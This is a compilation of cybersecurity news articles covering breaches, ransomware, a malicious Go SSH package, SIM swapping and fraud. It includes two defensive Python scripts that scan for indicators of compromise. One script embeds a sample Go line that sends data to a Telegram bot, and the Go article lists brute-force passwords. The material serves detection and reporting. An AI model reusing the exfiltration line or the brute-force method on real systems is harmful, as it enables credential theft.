
Google to Confirm Identity of Every Android App Developer

Google announced a new step to make Android apps safer: starting next year, developers who distribute apps to certified Android phones and tablets, even outside Google Play, will need to verify their legal identity. The change ties every app on certified devices to a named developer account, while keeping Android’s ability to run apps from other stores or direct downloads intact. 

What this means for everyday users and small developers is straightforward. If you download an app from a website or a third-party store, the app will now be linked to a developer who has provided a legal name, address, email and phone number. Google says hobbyists and students will have a lighter account option, but many independent creators may choose to register as a business to protect personal privacy. Certified devices are the ones that ship with Google services and pass Google’s compatibility tests; devices that do not include Google Play services may follow different rules. 

Google’s stated reason is security. The company reported that apps installed from the open internet are far more likely to contain malware than apps on the Play Store, and it says those risks come mainly from people hiding behind anonymous developer identities. By requiring identity verification, Google intends to make it harder for repeat offenders to publish harmful apps and to make malicious actors easier to track. 

The rollout is phased so developers and device makers can prepare. Early access invitations begin in October 2025, verification opens to all developers in March 2026, and the rules take effect for certified devices in Brazil, Indonesia, Singapore and Thailand in September 2026. Google plans a wider global rollout in 2027. If you are a developer, review Google’s new developer pages and plan to verify your account well before your target markets enforce the rule. 

A similar compliance pattern already exists in some places. For example, Apple requires developers who distribute apps in the European Union to provide a “trader status” and contact details to meet the EU Digital Services Act. These kinds of rules aim to increase accountability, but they also raise questions about privacy, the costs for small creators, and how “open” mobile platforms should remain. Both companies are moving toward tighter oversight of app distribution, with the goal of making digital marketplaces safer and more accountable.

This change marks one of the most significant shifts in Android’s open ecosystem. While users will still have the freedom to install apps from multiple sources, developers will now be held accountable for the software they release. For users, it could mean greater protection against scams and malicious apps. For developers, especially smaller ones, it signals a new balance between maintaining privacy and ensuring trust in the Android platform.


Cybersecurity Breach Leads to Major Disruption at Jaguar Land Rover


A major cybersecurity incident has caused serious disruption to the operations of Jaguar Land Rover, highlighting the growing vulnerability of automakers around the world to cyberattacks and the increasing need to maintain communication channels between automakers and their customers.

In a statement released on September 2, the British luxury car manufacturer said that the attack had severely disrupted its core computer systems. This led to the suspension of production across the company's UK assembly plants and ripple effects throughout the entire organisation, including global operations, supply chain coordination, and manufacturing engineering. 

Having taken proactive measures to counter the threat, JLR disabled several key systems, resulting in widespread problems in how suppliers and logistics partners could communicate in real-time with one another.

Although the company has not yet provided any details of the ransomware or other malicious code responsible for the breach, it has stated that its internal security experts are working closely with external cyber specialists to investigate, and that critical systems are being restored in a "controlled fashion" under their guidance.

The disruption has already had a major impact on Jaguar Land Rover's workforce and production schedule. The Halewood plant, near Liverpool, was instructed by email to close early on Monday morning, and local news reports indicate that the shutdown will continue until midweek.

The incident has affected not only the company's manufacturing operations but also its retail outlets, disrupting the flow of vehicles to customers. An official JLR statement confirmed that the company was dealing with a "cyber incident" and that critical systems had been shut down promptly to contain the situation.

The automaker stressed that, while investigations are ongoing, there is currently no indication that any customer data has been compromised. It acknowledged that both retail and production activities have been severely disrupted, but said that global applications are gradually being restored in a controlled manner.

Last year, JLR generated revenues of more than £28.99 billion ($38.75 billion), employing over 39,000 people across the globe. However, recent financial struggles have resulted in a 49 per cent drop in pre-tax profits for the company in the second quarter, owing in part to the fact that U.S. exports are slowed by tariffs. 

With this attack, JLR joins Marks & Spencer, the Co-op, and Harrods on the growing list of high-profile British brands targeted by cyberattacks this year. The attack is reported to have begun on Sunday, coinciding with the start of September, a time of heightened importance for the UK automotive industry because of the introduction of new registration plate identifiers.

A biannual change in vehicle prices usually occurs in March and September, and it is widely acknowledged as one of the most important promotional windows for manufacturers, as it drives a significant surge in vehicle sales. The disruption has therefore come at a particularly sensitive time for Jaguar Land Rover, since a large portion of the company's annual sales fall in these months.

As reported by the BBC, the automaker discovered the attack while it was still unfolding, which prompted it to shut down potentially affected IT systems to limit the consequences. In its statement issued on 2 September, Jaguar Land Rover confirmed that work is underway to return global applications to service in a controlled manner. 

No evidence has been found that customer data has been compromised, even though retail and production operations remain severely affected. According to industry experts, the incident underscores the growing vulnerability of highly digitalised manufacturing environments: with IT integrated into operational technology, a single breach can freeze entire plants and ripple through the supply chain in a matter of seconds.

Any downtime affects suppliers, retailers and partners through lost production, delayed sales and disruption. Dray Agha, Senior Manager of Security Operations at Huntress, commented that this example illustrates how a single IT system attack can shut down a multi-billion-dollar production line and directly hit sales, especially during a key period such as a new registration period.

Ryan Sherstobitof, Chief Threat Intelligence Officer at SecurityScorecard, reported that in addition to forcing the shutdown of JLR's Solihull factory, the cyberattack also prevented UK dealers from registering new cars and supplying parts. The company has not said what caused the breach or when it expects to recover.

The disruption is the second cyber incident to strike Jaguar Land Rover this year, following an incident in March in which hackers were reported to have stolen source code and tracking data. Nick Tausek, Lead Security Automation Architect at Swimlane, said the recurrence raises concerns that vulnerabilities exposed in the earlier breach may have been exploited again.

Other cybersecurity specialists emphasise that the episode highlights the urgency of strengthening cyber hygiene, robust authentication and authorisation practices, and tighter protection of data flows. "Cyber resilience is fundamental to overall business resilience," said Jon Abbott, CEO of ThreatAware, adding that disruptions can be hugely destructive to a business.

Many manufacturers are so heavily dependent on the uptime of their operations that they cannot afford to become the subject of future headlines about cyber incidents. The recent developments at Jaguar Land Rover are a timely reminder that cybersecurity is no longer a peripheral concern but a vital component of operational continuity.

As cars become increasingly connected and production systems grow more deeply intertwined with global supply chains, the resilience of digital infrastructure has a direct impact on market stability and customer confidence.

Manufacturers can do their part not only by implementing reactive containment measures but also by investing in proactive ones: enhancing endpoint protection, implementing layered defences, and conducting rigorous penetration tests to identify hidden vulnerabilities in their systems. Beyond technology, it is equally important to cultivate a culture of cyber awareness throughout the organisation so that every employee understands their role in safeguarding critical systems.

It's widely believed that companies which embed cyber resilience into the very core of their business DNA will gain a competitive advantage over their peers in the long run. Investors and consumers alike will gravitate towards brands which can demonstrate resilience when dealing with ever-evolving digital threats. Ultimately, the incident represents more than a disruption, as it also highlights the need for cybersecurity to be deemed just as important as innovation, safety, and sustainability in the automotive industry as a whole.

Zscaler Confirms Exposure in Salesloft-Linked Data Breach


Zscaler has confirmed that it is among the latest organizations to be impacted by a major supply chain attack exploiting the Salesloft Drift application, which integrates with Salesforce. 

According to the company, attackers managed to steal OAuth tokens tied to the third-party app, giving them access to Zscaler’s Salesforce environment. The security vendor explained that the compromised data mainly consisted of business-related information rather than sensitive personal or financial records. Specifically, the exposed details included names, work email addresses, job titles, phone numbers, location data, licensing and commercial details relating to Zscaler products, as well as plain-text content from certain customer support cases. However, Zscaler emphasized that no attachments, files, or images were accessed in the incident. 

Upon detecting the unauthorized activity, the company acted quickly by revoking the Drift app’s access and rotating other API tokens as a precaution. In addition, it claimed to have put in place new safeguards and strengthened protocols to reduce the likelihood of similar breaches in the future. 

While Zscaler noted that the incident appeared limited in scope and said there is no evidence so far of any misuse of the exposed data, it urged customers to exercise extra caution. The company warned that malicious actors could exploit the stolen information for phishing campaigns or social engineering attacks, and therefore advised clients to be vigilant about unsolicited emails, calls, or requests for confidential information. 

This breach is part of a wider campaign being tracked by security researchers as UNC6395, which is said to have compromised numerous Salesforce customer environments between August 8 and August 18. The attackers reportedly exfiltrated large volumes of customer data during that period, potentially affecting hundreds of organizations. 

More recently, it has also been revealed that the same campaign targeted a limited number of Google Workspace accounts through Salesloft Drift integrations, further underlining the scope of the threat. Given the scale and operational sophistication demonstrated, some experts have speculated that a nation-state threat actor could be behind the attacks. 

Zscaler’s disclosure follows similar admissions from other companies caught in the same campaign, highlighting the continuing risks posed by supply chain compromises in cloud-based business ecosystems.

Malicious Go Package Disguised as SSH Tool Steals Credentials via Telegram


Researchers have uncovered a malicious Go package disguised as an SSH brute-force tool that secretly collects and transmits stolen credentials to an attacker-controlled Telegram bot. The package, named golang-random-ip-ssh-bruteforce, first appeared on June 24, 2022, and was linked to a developer under the alias IllDieAnyway. Although the GitHub profile tied to this account has since been removed, the package is still accessible through Go’s official registry, raising concerns about supply chain security risks for developers who might unknowingly use it. 

The module is designed to scan random IPv4 addresses in search of SSH services operating on TCP port 22. Once it detects a running service, it attempts brute-force login using only two usernames, “root” and “admin,” combined with a list of weak and commonly used passwords. These include phrases such as “root,” “test,” “password,” “admin,” “12345678,” “1234,” “qwerty,” “webadmin,” “webmaster,” “techsupport,” “letmein,” and “Passw@rd.” If login succeeds, the malware immediately exfiltrates the target server’s IP address, username, and password through Telegram’s API to a bot called @sshZXC_bot, which forwards the stolen information to a user identified as @io_ping. Since Telegram communications are encrypted via HTTPS, the credential theft blends into ordinary web traffic, making detection much more difficult. 

The design of the tool helps it remain stealthy while maximizing efficiency. To bypass host identity checks, the module disables SSH host key verification by setting ssh.InsecureIgnoreHostKey as its callback. It continuously generates IPv4 addresses while attempting concurrent logins in an endless loop, increasing the chances of finding vulnerable servers. Interestingly, once it captures valid credentials for the first time, the malware terminates itself. This tactic minimizes its exposure, helping it avoid detection by defenders monitoring for sustained brute-force activity. 

Archival evidence suggests that the creator of this package has been active in the underground hacking community for years. Records link the developer to the release of multiple offensive tools, including an IP port scanner, an Instagram parser, and Selica-C2, a PHP-based botnet for command-and-control operations. Associated videos show tutorials on exploiting Telegram bots and launching SMS bomber attacks on Russian platforms. Analysts believe the attacker is likely of Russian origin, based on the language, platforms, and content of their activity. 

Security researchers warn that this Trojanized Go module represents a clear supply chain risk. Developers who unknowingly integrate it into their projects could unintentionally expose sensitive credentials to attackers, since the exfiltration traffic is hidden within legitimate encrypted HTTPS connections. This case underscores the growing threat of malicious open-source packages being planted in widely used ecosystems, where unsuspecting developers become conduits for large-scale credential theft.
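The dependency-audit check a defender would want after reading this: a scanner that walks a Go module's go.mod and source files for the indicators the report names. This is an added example, not code from the researchers or from the malicious package. The module name, the ssh.InsecureIgnoreHostKey callback and the @sshZXC_bot handle come from the report; api.telegram.org/bot is the public Telegram Bot API path that any bot client uses. The go.mod and source text embedded below are constructed samples, including the github.com/someuser/ path.

```python
"""Scan a Go module for the indicators of the package described above.

Added example, not code from the report's authors or from the malicious
package. The module name, the ssh.InsecureIgnoreHostKey callback and the
@sshZXC_bot handle come from the report; api.telegram.org/bot is the public
Telegram Bot API path that any bot client uses. The go.mod and source text
below are constructed samples, including the github.com/someuser/ path.
"""
import re

# Module name reported as malicious; matched on the name alone because the
# full path of a dependency may differ from the registry listing.
SUSPECT_MODULE_NAME = "golang-random-ip-ssh-bruteforce"

# One regex per source-level indicator.
SOURCE_INDICATORS = {
    # Disables SSH host key verification (turns off identity checks entirely).
    "insecure_host_key": re.compile(r"ssh\.InsecureIgnoreHostKey\s*\("),
    # Telegram Bot API endpoint: an outbound channel hidden in ordinary HTTPS.
    "telegram_bot_api": re.compile(r"api\.telegram\.org/bot"),
    # Bot handle named in the report.
    "telegram_bot_handle": re.compile(r"sshZXC_bot"),
}


def scan_go_mod(go_mod_text: str) -> list[str]:
    """Return go.mod require lines that pull in the suspect module."""
    hits = []
    for line in go_mod_text.splitlines():
        stripped = line.strip()
        if stripped.startswith("//"):
            continue
        if SUSPECT_MODULE_NAME in stripped:
            hits.append(stripped)
    return hits


def scan_go_source(src: str) -> dict[str, list[int]]:
    """Return {indicator: [line numbers]} for every indicator found in src."""
    found: dict[str, list[int]] = {}
    for lineno, line in enumerate(src.splitlines(), start=1):
        for name, pattern in SOURCE_INDICATORS.items():
            if pattern.search(line):
                found.setdefault(name, []).append(lineno)
    return found


def risk_summary(go_mod_text: str, sources: dict[str, str]) -> list[str]:
    """Combine both scans into one finding per hit, ready for a CI log."""
    findings = [f"go.mod: {line}" for line in scan_go_mod(go_mod_text)]
    for path, src in sources.items():
        for name, lines in scan_go_source(src).items():
            findings.append(f"{path}: {name} at line(s) {lines}")
    return findings


# Constructed go.mod; the github.com/someuser/ path is made up.
SAMPLE_GO_MOD = """module example.com/internal/tool

go 1.21

require (
    golang.org/x/crypto v0.17.0
    github.com/someuser/golang-random-ip-ssh-bruteforce v0.0.0-20220624000000-abcdef123456
)
"""

# Constructed Go source showing the two patterns the report describes.
SAMPLE_SOURCE = """package main

import (
    "net/http"
    "golang.org/x/crypto/ssh"
)

var token = "PLACEHOLDER_BOT_TOKEN"

func config(user, pass string) *ssh.ClientConfig {
    return &ssh.ClientConfig{
        User:            user,
        Auth:            []ssh.AuthMethod{ssh.Password(pass)},
        HostKeyCallback: ssh.InsecureIgnoreHostKey(), // no host identity check
    }
}

func report(msg string) {
    http.Get("https://api.telegram.org/bot" + token + "/sendMessage?text=" + msg)
}
"""

if __name__ == "__main__":
    for finding in risk_summary(SAMPLE_GO_MOD, {"main.go": SAMPLE_SOURCE}):
        print(finding)
```

Run it against a real module by reading go.mod and every .go file under the module root into the `sources` mapping; a hit on `insecure_host_key` alone is only a warning, since some test tooling legitimately skips host verification, but the combination with a Telegram bot endpoint inside a library dependency is what should fail the build.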

Data I/O Ransomware Attack Exposes Vulnerability in Global Electronics Supply Chain


Data I/O, a leading manufacturer specializing in device programming and security provisioning solutions, experienced a major ransomware attack in August 2025 that crippled core operations and raised industry-wide concerns about supply chain vulnerabilities in the technology sector.

The attack, first detected on August 16, 2025, used a sophisticated phishing campaign to compromise network credentials, enabling the attackers to exploit vulnerabilities in the company’s remote access systems and achieve lateral movement across network segments. 

This incident resulted in the encryption of critical proprietary data, including chip design schematics, manufacturing blueprints, sensitive communications, and firmware for products used by major clients such as Amazon, Apple, Google, and automotive manufacturers. 

Attack methodology 

Investigations mapped the attack to multiple MITRE ATT&CK techniques: T1566 for phishing, T1021 for remote services exploitation, T1486 for impact via data encryption, and possible use of T1078 via valid accounts. The attackers sent deceptive emails to Data I/O employees that tricked users into surrendering network credentials or accessing malicious links. After gaining access, the adversaries leveraged weaknesses in remote connectivity protocols to move laterally and encrypt essential files.

The ransomware incident caused widespread disruptions: internal and external communications, shipping, receiving, manufacturing production lines, and support functions were all impacted. The company activated incident response protocols, isolating affected systems and proactively taking critical platforms offline to prevent further spread. As of late August, some systems remained offline, without a clear timeline for full restoration. 

Broader implications 

Data I/O’s strategic role as a supply chain hub in electronics manufacturing made it a disproportionate target. Disruption reverberated across technology, automotive, and IoT sectors due to the company’s handling of security credentials and firmware for multi-billion-dollar products.

The incident underscores how ransomware operators increasingly target manufacturing entities, exploiting supply chain vulnerabilities to extract ransoms and maximize operational harm. The attackers reportedly demanded a ransom of $30 million, threatening to release encrypted data publicly if payment was not made within 72 hours. 

Data I/O engaged external cybersecurity experts and forensic professionals, initiated a full-scale investigation, and pledged transparency as more details emerged. The incident highlights urgent needs for improved remote access security, robust phishing defenses, and faster detection and response capabilities across the technology manufacturing sector. 

Analysts warn this attack may foreshadow future campaigns targeting critical infrastructure and high-tech supply chains, stressing the necessity for more resilient cybersecurity strategies.

Hackers Exploit Drift AI Integration to Steal Salesforce Data in Major Campaign

Hackers have launched a widespread attack campaign stealing sensitive data from Salesforce instances by exploiting a third-party integration, according to Google’s Threat Intelligence Group.

The group of attackers, tracked by Google as UNC6395, abused compromised OAuth tokens linked to Salesloft’s Drift AI chat agent to infiltrate Salesforce environments. Their main objective was credential theft, enabling large-scale exfiltration of customer data.

“Google Threat Intelligence is aware of over 700 potentially impacted organizations,” said Austin Larsen, principal threat analyst at Google. He confirmed that the hackers automated the campaign using a Python-based tool to rapidly harvest information.

Researchers clarified that Salesforce itself was not compromised. Instead, attackers targeted authentication tokens, later searching for AWS access keys, passwords, and Snowflake platform tokens.

The incidents occurred primarily between August 8 and August 18, with Salesloft working alongside Salesforce to revoke compromised Drift tokens by August 20. Salesloft also issued a security alert instructing administrators to reauthenticate Salesforce connections.

Salesforce acknowledged detecting “unusual activity” tied to a small number of customer accounts. As a precaution, the company has temporarily removed Drift from its AppExchange marketplace and is cooperating with Salesloft to support affected customers.

Google researchers noted that attackers attempted to cover their tracks by deleting query jobs but confirmed that event logs remain intact, urging security teams to audit logs for signs of exposure.

Charles Carmakal, CTO of Mandiant Consulting, advised impacted organizations to follow remediation guidance, including revoking API keys, rotating credentials, and hardening access controls.

The latest Google update warns the compromise extends beyond Salesforce integrations, as OAuth tokens linked to “Drift Email” were also targeted. A limited number of Google Workspace accounts were breached on August 9, though Google confirmed there was no compromise of Workspace or Alphabet systems overall.

Experts emphasize that any organization using Salesloft Drift should assume their authentication tokens may have been exposed and act immediately to secure accounts.
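The log audit Google urges above, worked through on constructed data as an added example (not code from Google, Salesforce or Salesloft). The record layout (timestamp, connected_app, user, query, rows), the app label "Salesloft Drift", the bulk-read threshold and every sample line are constructed for this demonstration; the indicators come from the report: queries hunting for AWS access keys, passwords and Snowflake tokens, issued through the Drift integration between August 8 and August 18, with the year assumed to be 2025.

```python
"""Audit query-log records for the Drift token abuse described above.

Added example, not code from Google, Salesforce or Salesloft. The record
layout, the connected-app label, the bulk threshold and the sample lines are
constructed; the indicators (credential-hunting queries issued via Drift
between August 8 and 18) come from the report, year assumed to be 2025.
"""
import csv
import io
import re
from datetime import datetime, timezone

WINDOW_START = datetime(2025, 8, 8, tzinfo=timezone.utc)
WINDOW_END = datetime(2025, 8, 18, 23, 59, 59, tzinfo=timezone.utc)
DRIFT_APP = "Salesloft Drift"   # assumed connected-app label
BULK_ROWS = 10_000              # assumed threshold for a bulk read

# Credential-hunting patterns: AWS access key id prefix, password words and
# Snowflake references, as reported for this campaign.
CREDENTIAL_PATTERNS = {
    "aws_access_key": re.compile(r"AKIA|aws[_ ]?(access|secret)", re.IGNORECASE),
    "password": re.compile(r"\b(password|passwd|secret)\b", re.IGNORECASE),
    "snowflake": re.compile(r"\bsnowflake\b", re.IGNORECASE),
}


def parse_records(csv_text: str) -> list[dict]:
    """Parse the constructed CSV layout into dicts with typed fields."""
    records = []
    for rec in csv.DictReader(io.StringIO(csv_text)):
        rec["timestamp"] = datetime.fromisoformat(rec["timestamp"]).astimezone(timezone.utc)
        rec["rows"] = int(rec["rows"])
        records.append(rec)
    return records


def audit(records: list[dict]) -> list[dict]:
    """Flag records worth an analyst's attention and explain why."""
    findings = []
    for rec in records:
        reasons = []
        for name, pattern in CREDENTIAL_PATTERNS.items():
            if pattern.search(rec["query"]):
                reasons.append(f"credential hunt: {name}")
        if rec["rows"] >= BULK_ROWS:
            reasons.append(f"bulk read: {rec['rows']} rows")
        drift_in_window = (rec["connected_app"] == DRIFT_APP
                           and WINDOW_START <= rec["timestamp"] <= WINDOW_END)
        if not reasons and not drift_in_window:
            continue
        # Drift-issued activity inside the campaign window is the strongest
        # signal; with a credential hunt or bulk read on top it is rated high.
        severity = "high" if drift_in_window and reasons else "medium"
        if drift_in_window:
            reasons.append("issued via Drift inside campaign window")
        findings.append({
            "timestamp": rec["timestamp"].isoformat(),
            "user": rec["user"],
            "severity": severity,
            "reasons": reasons,
        })
    return findings


def users_to_rotate(findings: list[dict]) -> set[str]:
    """Users whose tokens and credentials to rotate: every high-severity hit."""
    return {f["user"] for f in findings if f["severity"] == "high"}


# Constructed sample log; no real tenant, user or query is represented.
SAMPLE_LOG = """timestamp,connected_app,user,query,rows
2025-07-30T11:00:00+00:00,Salesloft Drift,integration@example.com,"SELECT Id, Name FROM Contact LIMIT 200",200
2025-08-10T03:14:00+00:00,Salesloft Drift,integration@example.com,"SELECT Id, Subject, Description FROM Case WHERE Description LIKE '%AKIA%'",12000
2025-08-10T03:20:00+00:00,Salesloft Drift,integration@example.com,"SELECT Id, Body FROM CaseComment WHERE Body LIKE '%password%' OR Body LIKE '%snowflake%'",8500
2025-08-11T08:00:00+00:00,Salesloft Drift,integration@example.com,"SELECT Id, Name FROM Lead LIMIT 50",50
2025-08-12T09:00:00+00:00,Sales Dashboard,analyst@example.com,"SELECT Id, Name, Amount FROM Opportunity WHERE CloseDate = THIS_MONTH",340
2025-08-15T22:41:00+00:00,Salesloft Drift,integration@example.com,"SELECT Id, Description FROM Account",50000
"""

if __name__ == "__main__":
    results = audit(parse_records(SAMPLE_LOG))
    for f in results:
        print(f["severity"], f["timestamp"], f["user"], "; ".join(f["reasons"]))
    print("rotate:", sorted(users_to_rotate(results)))
```

The point of keying on the connected app and the time window rather than on query text alone is that the report says the attackers deleted their query jobs but not the event logs: the integration identity and timestamps survive even when the job records do not, so a medium-severity "Drift inside the window" hit with an innocuous-looking query still deserves a look.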

Beware of SIM swapping attacks, your phone is at risk


In today's digital world, most of our online lives are tied to our phone numbers, so keeping them safe is a necessity. The bad news: hackers don't need your phone to take over your number.

What is SIM swapping?

Also known as SIMjacking, SIM swapping is a tactic in which a cybercriminal convinces your mobile carrier to port your phone number to a SIM card they control. The victim loses access to their phone number and service, while the cybercriminal gains full control of the number.

To convince the carrier to perform a SIM swap, the threat actor needs to know things about you. They can obtain that information from data breaches circulating on the dark web, by tricking you with a phishing scam into giving it up, or by harvesting your social media profiles if they contain public information.

Once they have the information, the threat actor calls customer support and requests that your number be moved to a new SIM card. In most cases, the carrier does not take much convincing.

Threats concerning SIM swapping

An attacker with your phone number can impersonate you to friends and family, and extort money. Your phone security is also at risk, as most online services ask for your phone number for account recovery. 

SIM swapping is dangerous because SMS-based two-factor authentication is still widely used. Many services require us to enable 2FA on our accounts, and some of them deliver the code by SMS.

Check your carrier's website to see whether there is an option to block SIM change requests; enabling it secures your phone number.

If your carrier does not offer this, look for the option to set a PIN or secret phrase. Some companies allow users to set one and will call you back to confirm before making changes to your account.

How to stay safe from SIM swapping?

Avoid SMS-based 2FA; use passkeys.

Use a SIM PIN for your phone to lock your SIM card.

Business and IT Leaders Diverge on Cloud and Security Priorities


Enterprises are preparing to expand their cloud investments, even as many remain dissatisfied with the financial returns of recent technology deployments, according to a new report from Unisys. The study, which surveyed 1,000 C-suite and IT executives across eight global markets, highlights a widening disconnect between business leaders and technology teams on priorities for cloud, AI, and security. 

Less than half of the 300 business executives surveyed said they were pleased with the return on investment from cloud, automation, and generative AI projects. 

Still, more than 75% of respondents said their organizations intend to increase cloud spending this year. 

Unisys suggests this optimism may be undermined by outdated systems and processes. 

“Organizations are still operating on outdated foundations and processes,” said Manju Naglapur, SVP and GM for cloud, applications, and infrastructure at Unisys. 

To unlock true value, he added, companies must modernize infrastructure, align IT and business priorities, and adopt proactive cybersecurity strategies. 

Misaligned Views on AI and Security 

The report found sharp differences in how IT and business executives perceive progress. More than two in five business leaders said their companies had made strong advances in AI pilots, while fewer than a third of IT leaders agreed. Concerns over readiness to support AI workloads also surfaced, with over 40% of IT leaders saying their current infrastructure cannot handle the demands of data-intensive AI systems. Security perceptions diverged even further. 

Nearly two-thirds of business executives described rigid or outdated security frameworks as barriers to innovation and data sharing. Only about a third of IT leaders shared that view. 

The Cost of a Reactive Approach 

Despite differences, executives largely agreed that cybersecurity strategies remain too reactive. Almost 90% said their organizations are prepared to respond to attacks once they occur, but lack a robust framework to prevent them. 

The stakes are high. More than two in five companies reported that IT outages can cost as much as $500,000 per hour in unplanned downtime. “The next wave of technological disruption is already underway,” Naglapur noted, “yet many organizations are still relying on outdated foundations.”

New Forensic System Tracks Ghost Guns Made With 3D Printing Using SIDE


The rapid rise of 3D printing has transformed manufacturing, offering efficient ways to produce tools, spare parts, and even art. But the same technology has also enabled the creation of “ghost guns” — firearms built outside regulated systems and nearly impossible to trace. These weapons have already been linked to crimes, including the 2024 murder of UnitedHealthcare CEO Brian Thompson, sparking concern among policymakers and law enforcement. 

Now, new research suggests that even if such weapons are broken into pieces, investigators may still be able to extract critical identifying details. Researchers from Washington University in St. Louis, led by Netanel Raviv, have developed a system called Secure Information Embedding and Extraction (SIDE). Unlike earlier fingerprinting methods that stored printer IDs, timestamps, or location data directly into printed objects, SIDE is designed to withstand tampering. 

Even if an object is deliberately smashed, the embedded information remains recoverable, giving investigators a powerful forensic tool. The SIDE framework is built on earlier research presented at the 2024 IEEE International Symposium on Information Theory, which introduced techniques for encoding data that could survive partial destruction. This new version adds enhanced security mechanisms, creating a more resilient system that could be integrated into 3D printers. 

The approach does not rely on obvious markings but instead uses loss-tolerant mathematical embedding to hide identifying information within the material itself. As a result, even fragments of plastic or resin may contain enough data to help reconstruct its origin. Such technology could help reduce the spread of ghost guns and make it more difficult for criminals to use 3D printing for illicit purposes. 

However, the system also raises questions about regulation and personal freedom. If fingerprinting becomes mandatory, even hobbyist printers used for harmless projects may be subject to oversight. This balance between improving security and protecting privacy is likely to spark debate as governments consider regulation. The potential uses of SIDE go far beyond weapons tracing. Any object created with a 3D printer could carry an invisible signature, allowing investigators to track timelines, production sources, and usage. 

Combined with artificial intelligence tools for pattern recognition, this could give law enforcement powerful new forensic capabilities. “This work opens up new ways to protect the public from the harmful aspects of 3D printing through a combination of mathematical contributions and new security mechanisms,” said Raviv, assistant professor of computer science and engineering at Washington University. He noted that while SIDE cannot guarantee protection against highly skilled attackers, it significantly raises the technical barriers for criminals seeking to avoid detection.

India's Biggest Cyber Fraud: Businessman Duped of ₹25 Crore Through Fake Trading App


A Kochi-based pharmaceutical company owner has suffered a loss of ₹25 crore in what is being described as the largest single-person cyber fraud case in India. 

The incident involved a sophisticated online trading scam, executed through a fake trading application that lured the victim with promises of lucrative returns. Despite being an experienced trader, the businessman fell prey to deception after engaging with the fraudulent app for nearly two years.

The scam unfolded over four months, during which the victim was lured by substantial profits displayed on his initial investments. These early gains convinced him of the app’s legitimacy, prompting more substantial investments.

Investigators from the Cyber Cell revealed that the app consistently showed double profits, creating an illusion of credibility and financial success. This psychological manipulation is a common tactic used by cyber fraudsters to build trust and encourage deeper engagement from unsuspecting victims. 

Trouble began when the businessman attempted to withdraw his funds, only to be met with repeated delays and a variety of excuses from the operators of the fake platform. As withdrawal requests were consistently stonewalled, suspicion grew. It was only after persistent failed attempts to access his money that the reality of the fraud became clear to the victim. 

Upon reporting the crime, swift action was taken by law enforcement. The Indian Cyber Crime Coordination Centre was immediately alerted and subsequently forwarded the information to the Thiruvananthapuram Cyber Operations Headquarters. A formal case was registered, and efforts have been initiated to freeze the remaining funds before they could be routed to additional accounts.

Investigation revealed that the fraudulent app was under the control of a foreign national, indicating possible international links and making the operation broader and more complex. The case has prompted a larger crackdown on similar cyber threats, with the Cyber Cell widening its probe to trace the perpetrators and prevent further occurrences. 

This incident highlights the growing sophistication of online financial scams in India, emphasizing the need for increased vigilance, even among experienced investors. Awareness and prompt reporting remain essential defenses against such evolving cyber threats.

Password Managers Face Clickjacking Flaw, Millions of Users at Risk



For years, password managers have been promoted as one of the safest ways to store and manage login details. They keep everything in one place, help generate strong credentials, and protect against weak or reused passwords. But new research has uncovered a weakness in several widely used browser extensions that could expose sensitive information for millions of people.


Details about the flaw

Security researchers recently found that 11 different password manager extensions share a vulnerability linked to the way they rely on the Document Object Model (DOM). The DOM is part of how web pages are structured, and in this case, it opens a door to a technique known as “clickjacking.”

Clickjacking works by tricking users into clicking on invisible or disguised elements of a web page. For example, a malicious site may look legitimate but contain hidden layers. A single misplaced click can unintentionally activate the password manager’s autofill function. Once that happens, the manager may begin entering saved credentials directly into the attacker’s page.

The danger lies in how quietly this happens. Users often close the site without realizing that their passwords or even stored credit card information and personal details like addresses or phone numbers may already have been copied by attackers.


The scale of the issue

The affected list includes some of the most recognized password managers in the industry. An estimated 40 million users worldwide could be impacted. While some companies have already addressed the issue through updates, not all providers have released fixes yet. For example, RoboForm has patched its extension, and Bitwarden has rolled out a new version. However, others remain in the process of responding.


Protecting yourself

There is no universal fix for clickjacking, but users can take important steps to reduce risk:

1. Be cautious with links: Avoid clicking on unfamiliar or suspicious links, even if they appear genuine. It is always safer to type the website address directly or use trusted bookmarks.

2. Update your tools: Make sure your password manager extension is up to date. Updates often contain security fixes that block known vulnerabilities.

3. Change autofill settings: If you use a Chromium-based browser, switch your password manager’s autofill to “on-click.” This ensures that details are only filled in when you actively choose to do so.

4. Disable unnecessary autofill: Consider turning off automatic completion for personal information like email addresses in your browser settings.


The bottom line

Password managers are still an essential tool for safe online habits, but like any technology, they are not immune to flaws. Staying alert, practicing careful browsing, and keeping your software updated can substantially lower the risk. Until every provider has addressed the vulnerability, users should take extra precautions to keep their digital identities secure.